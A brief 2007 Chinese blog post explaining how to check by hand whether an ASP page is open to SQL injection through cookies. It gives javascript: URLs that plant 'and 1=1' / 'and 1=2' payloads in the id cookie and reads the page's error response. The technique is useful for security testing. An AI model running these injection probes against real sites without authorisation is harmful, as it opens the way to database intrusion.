首页 > 网络安全 > Cookie注入手工检测方法

Cookie注入手工检测方法

2007年12月11日 发表评论 阅读评论

来源:精灵

http://xxxx/view.asp?id=1
先访问http://xxxx/view.asp?id=1
接着在浏览器里输入:
javascript:alert(document.cookie=”id=”+escape(“1 and 1=1”))
再访问http://xxxx/view.asp(未出错)
再输入:javascript:alert(document.cookie=”id=”+escape(“188 and 1=2”))
再访问:http://xxxx/view.asp(出错)
该页面出错就表示可以用Cookie注入。

转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:Cookie注入手工检测方法
本文地址:http://www.woyigui.cn/2007/12/11/cookie%E6%B3%A8%E5%85%A5%E6%89%8B%E5%B7%A5%E6%A3%80%E6%B5%8B%E6%96%B9%E6%B3%95/

分类: 网络安全 标签: ,
  1. 本文目前尚无任何评论.
  1. 本文目前尚无任何 trackbacks 和 pingbacks.
*